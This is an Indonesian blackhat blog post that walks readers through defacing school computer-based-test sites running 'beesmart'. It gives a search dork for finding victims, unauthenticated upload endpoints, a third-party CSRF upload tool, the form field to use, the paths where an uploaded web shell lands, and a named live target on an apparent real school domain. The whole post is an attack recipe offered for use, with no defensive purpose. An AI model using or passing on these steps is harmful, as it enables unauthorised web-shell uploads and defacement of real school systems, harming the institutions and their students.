Deface PoC Computer Based Test With CSRF

Hai, kembali lagi bersama saya Darkness di blog kami Screams Blackhat.

Kali ini saya akan memberikan tutorial Deface dengan PoC CBT with CSRF.

Bahan - Bahan :

Dork :

inurl:login.php intext:beesmart

*kembangkan lagi dorknya

Exploit :

http://site.com/panel/pages/upload-file.php

http://site.com/[path]/panel/pages/upload-file.php

http://site.com/panel/pages/upload_gambar.php

http://site.com/[path]/panel/pages/upload_gambar.php

CSRF : 

https://tools.dragonxploiter.tech/csrf.php

POST :

uploadfile

Shell :

Download Disini.

Akses Shell :

http://contoh.com/images/shell.php

http://contoh.com/[path]/images/shell.php

http://contoh.com/pictures/shell.php

http://contoh.com/[path]/pictures/shell.php

Live Target :

https://cbt1pas9.smpn2gempol.com/panel/pages/upload-file.php

Langkah - Langkah :

Dorking terlebih dahulu menggunakan dork yang telah saya sediakan di atas, jangan lupa untuk mengembangkan dorknya lagi, agar dapat web banyak.

Setelah dapat target, masukkan exploitnya yang telah saya sediakan juga di atas.

Contoh :

https://cbt1pas9.smpn2gempol.com/panel/pages/upload-file.php

Jika webnya vuln maka akan blank, seperti ini :

Nah jika sudah mendapatkan target yang vuln, kalian langsung saja ke tools CSRF nya, Disini

Masukkan target kalian beserta exploitnya, POST file kalian isi dengan "uploadfile" tanpa tanda kutip. Lalu klik Kunci Boss

Setelah target terkunci, bagian file isi dengan shell kalian, lalu klik Upload Gan. Nah jika berhasil maka akan ada tulisan success, seperti ini :

Setelah itu kalian tinggal akses shell kalian di http://contoh.com/images/shell.php , atau kalian bisa melihat letak shellnya di atas.

Sekian yang bisa saya sampaikan, semoga tutorial ini bisa berguna bagi kalian, terimakasih.

Bagikan Artikel ini